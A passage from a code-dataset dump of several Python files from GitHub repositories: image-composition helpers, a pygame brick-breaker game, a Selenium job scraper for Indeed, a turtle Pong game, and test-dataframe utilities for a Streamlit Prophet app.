zip(left, imgs))\n\n # Pad the images.\n padded = []\n for l, i in zip(left, imgs):\n left_pad = max(left) - l\n right_pad = max_width - left_pad - len(i[0])\n color = [(255, 255), (255, 255), (255, 255)]\n padded.append(np.pad(i, ((0, 0), (left_pad, right_pad), (0, 0)), mode='constant', constant_values=color))\n\n return np.concatenate(padded)\n\ndef merge(left_explainer, img_groups):\n titles = [i[0] for i in img_groups]\n groups = [i[1] for i in img_groups]\n\n def pad_y(img, before, after):\n color = [(255, 255), (255, 255), (255, 255)]\n return np.pad(img, ((before, after), (0, 0), (0, 0)), mode='constant', constant_values=color)\n\n max_y = max(max(i.start_y for i in group) for group in groups)\n padded_groups = [[pad_y(i.img, max_y - i.start_y, 0) for i in g] for g in groups]\n\n group_height = max(max(len(i) for i in group) for group in padded_groups)\n padded_groups = [[pad_y(i, 0, group_height - len(i)) for i in g] for g in padded_groups]\n\n imgs = [merge_vertical(*group) for group in padded_groups]\n imgs = [add_header(img, title) for img, title in zip(imgs, titles)]\n\n height = max(len(i) for i in imgs)\n plots = np.concatenate([pad_y(i, 0, height - len(i)) for i in imgs], axis=1)\n\n # Make space for side-header (explainer)\n color = [(255, 255), (255, 255), (255, 255)]\n plots = np.pad(plots, ((0, 0), (50, 0), (0, 0)), mode='constant', constant_values=color)\n for n, text in enumerate(left_explainer):\n img = new_header(50, group_height, text)\n img = img.transpose(Image.ROTATE_90)\n pil_to_img(img, plots, start_xy=(0, n * group_height + 25))\n\n return plots\n\n\ndef new_header(height, width, text):\n pil_img = Image.new(mode='RGBA', size=(width, height), color=(255, 255, 255))\n font = ImageFont.truetype(\"fonts/HelveticaNeue Medium.ttf\", 18)\n\n draw = ImageDraw.Draw(pil_img)\n w, h = draw.textsize(text, font=font)\n draw.multiline_text(((width-w)/2, (height-h)/2), text, (0,0,0), font=font)\n return pil_img\n\n\ndef pil_to_img(pil_img, img, start_xy=(0,0)):\n for y in range(pil_img.height):\n for x in range(pil_img.width):\n img[start_xy[1]+y, start_xy[0]+x] = pil_img.getpixel((x, y))\n\n\ndef add_header(img, text):\n width = len(img[0])\n height = 60\n pil_img = new_header(height, width, text)\n img = np.pad(img, ((height, 0), (0, 0), (0, 0)), mode='constant')\n pil_to_img(pil_img, img)\n return img\n\n\ndef save(img, path):\n io.imsave(path, img)\n","repo_name":"brinchj/ssi","sub_path":"py/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26595554879","text":"import os\nimport sys\nimport pygame\nfrom math import floor, sin, cos, atan, sqrt, degrees, radians\nfrom random import randrange, random, randint\nfrom time import sleep\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\nFRAME_RATE = 100\n\nlives = 3\nimmortal = False\ndead = False\nvictorywave = 0\n\nballcount = 1\nballsize = 30\nballspawny = 630 - (ballsize/2)\n\npygame.init()\n\n# create the screen and the clock\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.set_alpha(0) # make alpha bits transparent\nclock = pygame.time.Clock()\n\n# load & scale assets\nneogauge = pygame.mixer.music.load('assets/neogauge.mp3')\n\nclick = pygame.mixer.Sound('assets/click.ogg')\n\nsplat = pygame.mixer.Sound('assets/splat.wav')\n\nog_bg = pygame.image.load(\"assets/background2.png\")\nbg = pygame.transform.scale(og_bg, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nog_speedfade = pygame.image.load(\"assets/speedfade.png\")\nspeedfade = pygame.transform.scale(og_speedfade, (SCREEN_WIDTH, 70))\n\nyoudied = pygame.image.load(\"assets/youdied.png\")\nyoudiedscaled = pygame.transform.scale(youdied, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nyoulose = pygame.image.load(\"assets/youlose.jpg\")\nyoulosescaled = pygame.transform.scale(youlose, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nloading = pygame.image.load(\"assets/loading.gif\")\nloadingscaled = pygame.transform.scale(loading, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\ntitle = pygame.image.load(\"assets/title.png\")\ntitlescaled = pygame.transform.scale(title, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nvictory = pygame.image.load(\"assets/victory.png\")\nvictoryscaled = pygame.transform.scale(victory, (960, 540))\n\ninstructions = pygame.image.load(\"assets/instructions.png\")\ninstructionsscaled = pygame.transform.scale(instructions, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nheart = pygame.image.load(\"assets/heart.png\")\nheartscaled = pygame.transform.scale(heart, (30, 30))\n\n# create sprite groups\nplatforms = pygame.sprite.Group()\nballs = pygame.sprite.Group()\npowerups = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nblood = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\n\n# declare functions\ndef addenemy(x, y, size):\n enemies.add(Enemy(x, y, size))\n\ndef spawnenemies(count, size, xspacing, yspacing):\n enemyxspacing = xspacing + size\n enemyyspacing = yspacing + size\n enemycontainer = SCREEN_WIDTH - (2*size)\n for i in range(count):\n x = ((enemyxspacing)*i) % enemycontainer\n y = (enemyyspacing)*(1 + floor((enemyxspacing)*i/enemycontainer))\n addenemy(x, y, size)\n\ndef spawnballs(count, x, y, size, velocity, angle):\n for i in range(count):\n balls.add(Ball(x, y, size, velocity, angle))\n\ndef splatter(count, centerx, centery):\n for i in range(count):\n blood.add(Bloodsplatter(centerx, centery))\n\n# declare all classes (this is long - ends at line 554)\nclass Platform(pygame.sprite.Sprite):\n\n def __init__(self, xcenter, y):\n super().__init__()\n\n self.defaultw = 150\n self.width = self.defaultw\n self.activeheight = round(self.width/92*9)\n\n # image size 92 x 9\n # platform width 78 (centered)\n\n\n self.PFnonenone = pygame.image.load(\"assets/platform/PFnonenone.png\").convert_alpha()\n self.PFnonehalf = pygame.image.load(\"assets/platform/PFnonehalf.png\").convert_alpha()\n self.PFnonefull = pygame.image.load(\"assets/platform/PFnonefull.png\").convert_alpha()\n self.currentimg = self.PFnonenone\n self.image = pygame.transform.scale(self.currentimg, (self.width, self.activeheight))\n self.rect = self.image.get_rect()\n\n self.rect.centerx = xcenter\n self.rect.y = y\n\n self.maxspd = 5\n self.speed = 0\n\n self.accel = 0.5\n self.hasmoved = False\n\n self.growcooldown = 0\n self.speedcooldown = 0\n\n def move(self, xchange, ychange):\n self.rect.x += xchange\n self.rect.y += ychange\n\n def runmovement(self):\n\n keys_pressed = pygame.key.get_pressed()\n\n self.hasmoved = False\n # if not left and right keys at once\n if not ((keys_pressed[pygame.K_LEFT] or keys_pressed[pygame.K_a]) and (keys_pressed[pygame.K_RIGHT] or keys_pressed[pygame.K_d])):\n # if leftwards inputs\n if keys_pressed[pygame.K_LEFT] or keys_pressed[pygame.K_a]:\n # accelerate to the left\n self.speed = max(-1*self.maxspd, self.speed - self.accel)\n self.hasmoved = True\n # if rightwards inputs\n if keys_pressed[pygame.K_RIGHT] or keys_pressed[pygame.K_d]:\n # accelerate to the right\n self.speed = min(self.maxspd, self.speed + self.accel)\n self.hasmoved = True\n\n if not self.hasmoved:\n if self.speed != 0:\n if self.speed < 0:\n self.speed += self.accel\n else:\n self.speed -= self.accel\n if self.rect.x > 0 and self.speed < 0:\n self.move(self.speed, 0)\n if self.rect.x + self.rect.width < SCREEN_WIDTH and self.speed > 0:\n self.move(self.speed, 0) \n\n def lenset(self, width):\n self.width = width\n self.activeheight = max(round(width/92*9), 15)\n tempxcenter = self.rect.centerx\n self.image = pygame.transform.scale(self.currentimg, (width, self.activeheight))\n self.rect.h = self.image.get_height()\n self.rect.w = self.image.get_width()\n self.rect.centerx = tempxcenter\n\n def reset(self):\n self.width = self.defaultw\n self.rect.centerx = 500\n self.rect.y = 630\n self.maxspd = 5\n self.speed = 0\n self.lenset(self.width)\n self.growcooldown = 0\n self.speedcooldown = 0\n\n def checkcooldowns(self):\n if self.growcooldown > 0:\n self.growcooldown -= 1\n if self.growcooldown == 0:\n self.lenset(self.width)\n if self.speedcooldown > 0:\n self.speedcooldown -= 1\n if self.speedcooldown == 0:\n self.accel = 0.5\n self.maxspd = 5\n self.speed = 0\n\n def setblasters(self):\n\n if self.speed != 0:\n\n if self.speed == self.maxspd:\n self.currentimg = pygame.transform.flip(self.PFnonefull, True, False)\n elif self.speed*-1 == self.maxspd:\n self.currentimg = self.PFnonefull\n\n elif self.speed > 0:\n self.currentimg = pygame.transform.flip(self.PFnonehalf, True, False)\n else:\n self.currentimg = self.PFnonehalf\n\n else:\n self.currentimg = self.PFnonenone\n\n self.image = pygame.transform.scale(self.currentimg, (self.rect.width, self.activeheight))\n\n def update(self):\n\n self.checkcooldowns()\n\n keys_pressed = pygame.key.get_pressed()\n\n self.runmovement()\n\n self.setblasters()\n\nclass Ball(pygame.sprite.Sprite):\n\n def __init__(self, xcenter, ycenter, size, velocity, angle):\n super().__init__()\n\n self.size = size\n\n self.og_ball = pygame.image.load(\"assets/ball.png\").convert_alpha()\n self.og_powerball = pygame.image.load(\"assets/powerball.png\").convert_alpha()\n self.image = pygame.transform.scale(self.og_ball, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = xcenter - (self.size/2)\n self.realy = ycenter - (self.size/2)\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n self.velocity = velocity\n self.angle = randrange(0, 900)/10+45\n\n self.firecooldown = 0\n\n def move(self, xchange, ychange):\n self.realx += xchange\n self.realy += ychange\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n def selfspawnballs(self, count, x, y, size, velocity, angle):\n for i in range(count):\n balls.add(Ball(x, y, size, velocity, angle))\n\n def resetballs(self):\n for ball in balls:\n ball.realx = 500 - (ball.size/2)\n ball.realy = 628 - ball.size\n ball.velocity = 0\n ball.angle = randrange(0, 90)+45\n ball.size = 20\n ball.firecooldown = 0\n\n def checkcooldowns(self):\n if self.firecooldown > 0:\n self.firecooldown -= 1\n\n\n def getx(self, angle):\n return cos(radians(self.angle))*self.velocity\n\n def gety(self, angle):\n return sin(radians(self.angle))*self.velocity*-1\n\n def verticalbounce(self):\n self.angle = (90 - self.angle) + 90\n\n def horizontalbounce(self):\n self.angle = (180 - self.angle) + 180\n\n def multiball(self):\n self.selfspawnballs(2, self.rect.x, self.rect.y, self.size, 5, randrange(0, 900)/10+45)\n\n def bounceonedges(self):\n if ((self.rect.x + self.size) >= SCREEN_WIDTH):\n self.rect.right = SCREEN_WIDTH + 1\n self.verticalbounce()\n elif ((self.rect.x) <= 0):\n self.rect.x = 1\n if 90 <= (self.angle % 360) <= 270:\n self.verticalbounce()\n if ((self.rect.y) < 0):\n self.rect.y = 1\n if 0 <= (self.angle % 360) <= 180:\n self.horizontalbounce()\n\n def updatepowers(self):\n if self.firecooldown > 0:\n self.firecooldown -= 1\n self.image = pygame.transform.scale(self.og_powerball, (self.size, self.size))\n else:\n self.image = pygame.transform.scale(self.og_ball, (self.size, self.size))\n\n def collidewplatform(self, platform):\n if pygame.sprite.collide_rect(self, platform):\n\n if platform.rect.top < (self.rect.bottom - self.gety(self.angle) - 1):\n self.verticalbounce()\n else:\n self.horizontalbounce()\n\n ballpospercent = ((self.rect.centerx - platform.rect.x)/platform.rect.width)*100\n self.angle -= (ballpospercent - 50)/3 - 360\n\n def collidewenemies(self, enemies, Powerup):\n\n enemies_hit = pygame.sprite.spritecollide(self, enemies, True)\n\n for enemy in enemies_hit:\n if random() >= 0.85:\n Powerup.addpowerup(enemy.rect.x, enemy.rect.y, 40, randrange(1, 5))\n splatter(30, enemy.rect.centerx, enemy.rect.centery)\n\n if len(enemies_hit) == 2:\n if enemies_hit[0].rect.x == enemies_hit[1].rect.x:\n if self.firecooldown <= 0:\n self.verticalbounce()\n elif enemies_hit[0].rect.y == enemies_hit[1].rect.y:\n if self.firecooldown <= 0:\n self.horizontalbounce()\n else:\n if self.firecooldown <= 0:\n self.verticalbounce()\n self.horizontalbounce()\n else:\n for enemy in enemies_hit:\n if abs(self.rect.centerx - enemy.rect.centerx) > abs(self.rect.centery - enemy.rect.centery):\n if self.firecooldown <= 0:\n self.verticalbounce()\n else:\n if self.firecooldown <= 0:\n self.horizontalbounce()\n\n\n def update(self, platform, enemies, Powerup, immortal):\n\n if self.rect.y > SCREEN_HEIGHT:\n if not immortal:\n balls.remove(self)\n else:\n self.rect.bottom = SCREEN_HEIGHT\n self.horizontalbounce()\n\n self.updatepowers()\n\n self.move(self.getx(self.angle), self.gety(self.angle))\n\n if platform.hasmoved: \n self.velocity = 5\n\n self.bounceonedges()\n\n self.collidewplatform(platform)\n\n if self.velocity != 0 and pygame.sprite.spritecollide(self, enemies, False):\n self.collidewenemies(enemies, Powerup)\n splat.play()\n\nclass Enemy(pygame.sprite.Sprite):\n\n def __init__(self, x, y, size):\n super().__init__()\n\n self.size = size\n\n og_image = pygame.image.load(\"assets/enemy2.png\").convert_alpha()\n self.image = pygame.transform.scale(og_image, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = x\n self.realy = y\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n self.movecycle = 0\n\n def shoot(self, platform):\n xdiff = platform.rect.centerx - self.rect.x\n ydiff = platform.rect.centery - self.rect.y\n\n # a^2 + b^2 = c^2\n\n # a is x, b is y\n\n # let x represent a/b\n\n # solve for b because y is always positive\n\n # n = x**2 + 1\n # b = (c * sqrt(n))/n\n\n c = 3 # velocity of bullet\n\n x = xdiff/ydiff\n n = x**2 + 1\n b = (c * sqrt(n))/n\n\n angle = degrees(atan(x))\n\n bullets.add(Bullet(self.rect.centerx, self.rect.bottom, x*b, b, angle))\n\n def update(self, platform):\n shootprobability = 0.015/len(enemies)\n if random() < shootprobability:\n self.shoot(platform)\n self.rect.x = self.realx + self.size + 20*sin(self.movecycle)\n self.movecycle += 0.03\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, xcenter, y, xchange, ychange, angle):\n super().__init__()\n\n og_bullet = pygame.image.load(\"assets/bullet.png\").convert_alpha()\n self.image = pygame.transform.rotate(pygame.transform.scale(og_bullet, (10, 20)), angle)\n self.rect = self.image.get_rect()\n\n self.realxcenter = xcenter\n self.realy = y\n\n self.rect.centerx = self.realxcenter\n self.rect.y = self.realy\n\n self.xchange = xchange\n self.ychange = ychange\n\n def update(self, platform, immortal):\n self.realxcenter += self.xchange\n self.realy += self.ychange\n\n self.rect.centerx = round(self.realxcenter)\n self.rect.y = round(self.realy)\n\n if self.rect.y >= SCREEN_HEIGHT:\n bullets.remove(self)\n\n if pygame.sprite.spritecollide(platform, bullets, True) and not immortal:\n if not dead:\n platform.lenset(platform.rect.w - 20)\n\nclass Powerup(pygame.sprite.Sprite):\n\n def __init__(self, x, y, size, power):\n super().__init__()\n\n self.size = size\n\n\n # POWER VALUES:\n # 1 = grow mushroom\n # 2 = fast platform\n # 3 = multiball\n self.power = power\n\n if self.power == 1:\n og_mushroom = pygame.image.load(\"assets/mushroom.png\").convert_alpha()\n self.image = pygame.transform.scale(og_mushroom, (self.size, self.size))\n self.rect = self.image.get_rect() \n if self.power == 2:\n og_swiftness = pygame.image.load(\"assets/swiftness.png\").convert_alpha()\n self.image = pygame.transform.scale(og_swiftness, (self.size, self.size))\n self.rect = self.image.get_rect()\n if self.power == 3:\n og_multiball = pygame.image.load(\"assets/multiball.png\").convert_alpha()\n self.image = pygame.transform.scale(og_multiball, (self.size, self.size))\n self.rect = self.image.get_rect()\n if self.power == 4:\n og_fireflower = pygame.image.load(\"assets/fireflower.png\").convert_alpha()\n self.image = pygame.transform.scale(og_fireflower, (self.size, self.size))\n self.rect = self.image.get_rect()\n\n\n self.realx = x\n self.realy = y\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n def move(self, xchange, ychange):\n self.realx += xchange\n self.realy += ychange\n self.rect.x = int(self.realx)\n self.rect.y = int(self.realy)\n\n def addpowerup(x, y, size, power):\n powerups.add(Powerup(x, y, size, power))\n\n def xcenter(self):\n return self.rect.x + (self.size/2)\n\n def ycenter(self):\n return self.rect.y + (self.size/2)\n\n def dopower(self, platforms, balls):\n if self.power == 1:\n for platform in platforms:\n platform.lenset(platform.rect.w + 75)\n platform.growcooldown = 150\n elif self.power == 2:\n for platform in platforms:\n platform.maxspd = 10\n platform.accel = 1\n platform.speedcooldown = 1500\n elif self.power == 3:\n for ball in balls:\n ball.multiball()\n elif self.power == 4:\n for ball in balls:\n ball.firecooldown = 400\n\n def update(self, platforms, balls):\n self.move(0, 2)\n if pygame.sprite.spritecollide(self, platforms, False):\n self.dopower(platforms, balls)\n powerups.remove(self)\n\nclass Bloodsplatter(pygame.sprite.Sprite):\n def __init__(self, xcenter, ycenter):\n super().__init__()\n\n og_blood = pygame.image.load(\"assets/blood.png\")\n self.image = pygame.transform.scale(og_blood, (randint(5, 20), randint(5, 20)))\n self.rect = self.image.get_rect()\n\n self.rect.centerx = xcenter\n self.rect.centery = ycenter\n\n self.realw = self.rect.w\n self.realh = self.rect.h\n\n self.angle = randint(1, 361)\n\n self.velocity = 2\n\n def getx(self, angle):\n return cos(radians(self.angle))*self.velocity\n\n def gety(self, angle):\n return sin(radians(self.angle))*self.velocity*-1\n\n def update(self):\n self.rect.centerx += self.getx(self.angle)\n self.rect.centery += self.gety(self.angle)\n self.realw -= 0.7\n self.realh -= 0.7\n self.rect.h = round(self.realh)\n self.rect.w = round(self.realw)\n if self.rect.w <= 0 or self.rect.h <= 0:\n blood.remove(self)\n\n\ntitlescreen = True\nlosescreen = False\nmaingame = False\ninstructions = False\nyoulose = False\n\n\n\npygame.mixer.music.play(-1, 0, 0)\n\n\n# main game loop\nwhile True:\n\n\n # get user inputs\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # when user clicks the 'x' on the window, close the game\n pygame.quit()\n sys.exit()\n\n keys_pressed = pygame.key.get_pressed()\n mouse_buttons = pygame.mouse.get_pressed()\n\n\n if titlescreen:\n screen.blit(titlescaled, (0, 0))\n if keys_pressed[pygame.K_s]:\n screen.blit(loadingscaled, (0, 0))\n maingame = True\n if keys_pressed[pygame.K_i]:\n maingame = False\n titlescreen = False\n instructions = True\n title = False\n youlose = False\n\n\n if instructions:\n screen.blit(instructionsscaled, (0, 0))\n if keys_pressed[pygame.K_ESCAPE]:\n instructions = False\n titlescreen = True\n maingame = False\n youlose = False\n\n \n if losescreen:\n screen.blit(youlosescaled, (0, 0))\n\n if mouse_buttons[0]:\n instructions = False\n titlescreen = True\n maingame = False\n losescreen = False\n click.play()\n screen.blit(loadingscaled, (0, 0))\n\n\n if maingame:\n # create starting objects\n platform = Platform(500, 630)\n platforms.add(platform)\n spawnenemies(60, 50, 10, 5)\n spawnballs(ballcount, platform.rect.centerx, ballspawny, ballsize, 0, randrange(0, 900)/10+45)\n lives = 3\n dead = False\n\n while maingame:\n \"\"\"\n EVENTS section - how the code reacts when users do things\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # when user clicks the 'x' on the window, close the game\n pygame.quit()\n sys.exit()\n\n # get user inputs\n keys_pressed = pygame.key.get_pressed()\n mouse_pos = pygame.mouse.get_pos()\n mousex = mouse_pos[0]\n mousey = mouse_pos[1]\n mouse_buttons = pygame.mouse.get_pressed()\n\n # respawn button\n if dead and (((184 <= mousex <= 820) and (360 <= mousey <= 424) and mouse_buttons[0]) or keys_pressed[pygame.K_r]):\n balls.empty()\n platform.reset()\n click.play()\n spawnballs(ballcount, platform.rect.centerx, ballspawny, ballsize, 0, randrange(0, 900)/10+45)\n dead = False\n if dead and (((184 <= mousex <= 820) and (437 <= mousey <= 500) and mouse_buttons[0]) or keys_pressed[pygame.K_ESCAPE]):\n maingame = False\n titlescreen = True\n losescreen = False\n platforms.empty()\n balls.empty()\n enemies.empty()\n bullets.empty()\n blood.empty()\n powerups.empty()\n\n\n \"\"\"\n UPDATE section - manipulate everything on the screen\n \"\"\"\n\n platform.update()\n enemies.update(platform)\n balls.update(platform, enemies, Powerup, immortal)\n powerups.update(platforms, balls)\n bullets.update(platform, immortal)\n blood.update()\n if len(balls) < 1 or platform.rect.w < 40:\n if not dead:\n if lives > 1:\n lives -= 1\n else:\n maingame = False\n titlescreen = False\n losescreen = True\n platforms.empty()\n balls.empty()\n enemies.empty()\n bullets.empty()\n blood.empty()\n powerups.empty()\n dead = True\n\n if maingame:\n \"\"\"\n DRAW section - make everything show up on screen\n \"\"\"\n screen.blit(bg, (0, 0))\n\n if platform.speedcooldown > 0:\n screen.blit(speedfade, (0, 605))\n\n enemies.draw(screen)\n balls.draw(screen)\n platforms.draw(screen)\n powerups.draw(screen)\n bullets.draw(screen)\n blood.draw(screen)\n\n if dead and not len(enemies) < 1:\n screen.blit(youdiedscaled, (0, 0))\n\n if len(enemies) < 1:\n vicy = sin(victorywave)\n screen.blit(victoryscaled, (20, vicy*100 + 80))\n immortal = True\n victorywave += 0.03\n\n for i in range(lives):\n screen.blit(heartscaled, (10+30*i, 660))\n\n pygame.display.flip() # Pygame uses a double-buffer, without this we see half-completed frames\n\n clock.tick(FRAME_RATE) # Pause the clock to always maintain FRAME_RATE frames per second\n\n pygame.display.flip()\n","repo_name":"lambpasta/brickinvaders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21801509355","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\n\ndef get_page_count(keyword):\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n \n browser = webdriver.Chrome(options=options)\n base_url = \"https://kr.indeed.com/jobs?q=\"\n browser.get(f\"{base_url}{keyword}\")\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n pagination = soup.find(\"nav\", class_=\"ecydgvn0\")\n if pagination == None:\n return 1 # 반환할 페이지 수\n pages = pagination.find_all(\"div\", class_=\"ecydgvn1\", recursive=False)\n count = len(pages)\n if count >= 5:\n return 5\n else:\n return count\n\n\ndef extract_indeed_jobs(keyword):\n pages = get_page_count(keyword)\n results = []\n for page in range(pages):\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n \n browser = webdriver.Chrome(options=options)\n \n base_url = \"https://kr.indeed.com/jobs\"\n \n browser.get(f\"{base_url}?q={keyword}&start={page*10}\")\n \n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n job_list = soup.find(\"ul\", class_=\"jobsearch-ResultsList\")\n jobs = job_list.find_all('li', recursive=False)\n for job in jobs:\n zone = job.find(\"div\", class_=\"mosaic-zone\")\n if zone == None:\n anchor = job.select_one(\"h2 a\")\n title = anchor['aria-label']\n link = anchor['href']\n company = job.find(\"span\", class_=\"companyName\")\n location = job.find(\"div\", class_=\"companyLocation\")\n job_data = {\n 'link' : f\"http://kr.indeed.com{link}\",\n 'company' : company.string.replace(\",\", \" \"),\n 'location' : location.string.replace(\",\", \" \"),\n 'position' : title.replace(\",\", \" \")\n \n }\n results.append(job_data)\n return results\n","repo_name":"shunchae/job_scrapper","sub_path":"extractors/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41808978998","text":"# Simple Pong Game\n\nimport turtle\n\n\ndef paddle_l_up():\n y = paddle_l.ycor()\n print(y)\n if y >= 240:\n return\n y += 20\n paddle_l.sety(y)\n\n\ndef paddle_l_down():\n y = paddle_l.ycor()\n print(y)\n if y <= -240:\n return\n y -= 20\n paddle_l.sety(y)\n\n\ndef paddle_r_up():\n y = paddle_r.ycor()\n print(y)\n if y >= 240:\n return\n y += 20\n paddle_r.sety(y)\n\n\ndef paddle_r_down():\n y = paddle_r.ycor()\n print(y)\n if y <= -240:\n return\n y -= 20\n paddle_r.sety(y)\n\n\nwn = turtle.Screen()\nwn.title(\"Pong by @danilrespati\")\nwn.bgcolor(\"black\")\nwn.setup(width=800, height=600)\nwn.tracer()\n\n# Paddle L\npaddle_l = turtle.Turtle()\npaddle_l.speed(0)\npaddle_l.color(\"white\")\npaddle_l.shape(\"square\")\npaddle_l.shapesize(stretch_wid=5, stretch_len=1)\npaddle_l.penup()\npaddle_l.goto(-350, 0)\n\n# Paddle R\npaddle_r = turtle.Turtle()\npaddle_r.speed(0)\npaddle_r.color(\"white\")\npaddle_r.shape(\"square\")\npaddle_r.shapesize(stretch_wid=5, stretch_len=1)\npaddle_r.penup()\npaddle_r.goto(+350, 0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.color(\"white\")\nball.shape(\"square\")\nball.penup()\nball.goto(0, 0)\n\nwn.listen()\nwn.onkeypress(paddle_l_up, \"w\")\nwn.onkeypress(paddle_l_down, \"s\")\nwn.onkeypress(paddle_r_up, \"Up\")\nwn.onkeypress(paddle_r_down, \"Down\")\n\n# Main game loop\nwhile True:\n wn.update()\n","repo_name":"danilrespati/Course","sub_path":"Python/Pong Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71705805240","text":"from typing import Any, Dict, Optional\n\nimport numpy as np\nimport pandas as pd\nfrom streamlit_prophet.lib.utils.load import load_config\n\nconfig, _, _ = load_config(\n \"config_streamlit.toml\", \"config_instructions.toml\", \"config_readme.toml\"\n)\n\n\ndef make_test_df(\n ds: Optional[Dict[Any, Any]] = None,\n cols: Optional[Dict[Any, Any]] = None,\n start: str = \"2010-01-01\",\n end: str = \"2020-01-01\",\n freq: str = \"D\",\n range: int = 10,\n) -> pd.DataFrame:\n \"\"\"Creates a sample dataframe with specifications defined by the arguments, for testing purpose.\n\n Parameters\n ----------\n ds : Optional[dict]\n Specifications for date column.\n cols : Optional[dict]\n Specifications for other columns.\n start : str\n Start date for date column.\n end : str\n End date for date column.\n freq : str\n Frequency for date column.\n range : int\n Range for numerical columns.\n\n Returns\n -------\n pd.DataFrame\n Dataframe that will be used for unit tests.\n \"\"\"\n df = pd.DataFrame()\n if ds is not None:\n df[\"ds\"] = pd.date_range(\n start=start if \"start_date\" not in ds.keys() else ds[\"start_date\"],\n end=end if \"end_date\" not in ds.keys() else ds[\"end_date\"],\n freq=freq if \"freq\" not in ds.keys() else ds[\"freq\"],\n )\n if \"str\" in ds.keys():\n df[\"ds\"] = df[\"ds\"].map(lambda x: x.strftime(ds[\"str\"]))\n if \"frac_nan\" in ds.keys():\n df.loc[df.sample(frac=ds[\"frac_nan\"]).index, \"ds\"] = np.nan\n if cols is not None:\n N = len(df) if len(df) > 0 else 1000\n for col in cols.keys():\n if \"cat\" in cols[col].keys():\n df[col] = np.random.choice(a=cols[col][\"cat\"], size=N)\n else:\n range = range if \"range\" not in cols[col].keys() else cols[col][\"range\"]\n df[col] = np.random.randn(1, N).ravel() * range\n if \"abs\" in cols[col].keys():\n df[col] = abs(df[col])\n if \"frac_nan\" in cols[col].keys():\n df.loc[df.sample(frac=cols[col][\"frac_nan\"]).index, col] = np.nan\n return df\n\n\n# Synthetic categorical variables\nint_long_target = list(range(1, config[\"validity\"][\"min_target_cardinality\"] + 2))\nint_short_target = list(range(1, config[\"validity\"][\"min_target_cardinality\"] - 1))\nint_long_cat = list(range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] + 2))\nint_short_cat = list(range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] - 1))\nstr_long_target = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"min_target_cardinality\"] + 2)\n]\nstr_short_target = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"min_target_cardinality\"] - 1)\n]\nstr_long_cat = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] + 2)\n]\nstr_short_cat = [\n chr(ord(\"@\") + i) for i in range(1, config[\"validity\"][\"max_cat_reg_cardinality\"] - 1)\n]\n\n# Test dataframes\ndf_test = dict()\ndf_test[0] = pd.DataFrame()\ndf_test[1] = make_test_df(\n cols={0: {\"cat\": [\"A\", \"B\", \"C\"]}, 1: {\"cat\": [\"A\", \"B\"]}, 2: {\"cat\": [\"A\"]}, 3: {}}\n)\ndf_test[2] = make_test_df(\n cols={0: {\"cat\": [\"A\"], \"frac_nan\": 1}, 1: {\"cat\": [\"A\"], \"frac_nan\": 0.1}, 2: {\"cat\": [\"A\"]}}\n)\ndf_test[3] = make_test_df(cols={\"y\": {\"cat\": int_short_target}})\ndf_test[4] = make_test_df(cols={\"y\": {\"cat\": int_short_target, \"frac_nan\": 0.1}})\ndf_test[5] = make_test_df(cols={\"y\": {\"cat\": int_short_target, \"frac_nan\": 1}})\ndf_test[6] = make_test_df(cols={\"y\": {\"cat\": str_long_target}})\ndf_test[7] = make_test_df(cols={\"y\": {\"cat\": str_long_target, \"frac_nan\": 0.1}})\ndf_test[8] = make_test_df(ds={}, cols={\"y\": {\"cat\": int_long_target}})\ndf_test[9] = make_test_df(\n ds={\"str\": \"%Y-%m-%d\"}, cols={\"y\": {\"cat\": int_long_target, \"frac_nan\": 0.1}}\n)\ndf_test[10] = make_test_df(ds={\"freq\": \"Y\"}, cols={\"y\": {\"range\": 100}})\ndf_test[11] = make_test_df(ds={\"freq\": \"H\"}, cols={\"y\": {\"range\": 1, \"abs\": True}})\ndf_test[12] = make_test_df(ds={\"frac_nan\": 0.1}, cols={\"y\": {\"range\": 1, \"frac_nan\": 0.1}})\ndf_test[13] = make_test_df(\n cols={\n 0: {},\n 1: {\"frac_nan\": 0.1},\n 2: {\"frac_nan\": 1},\n 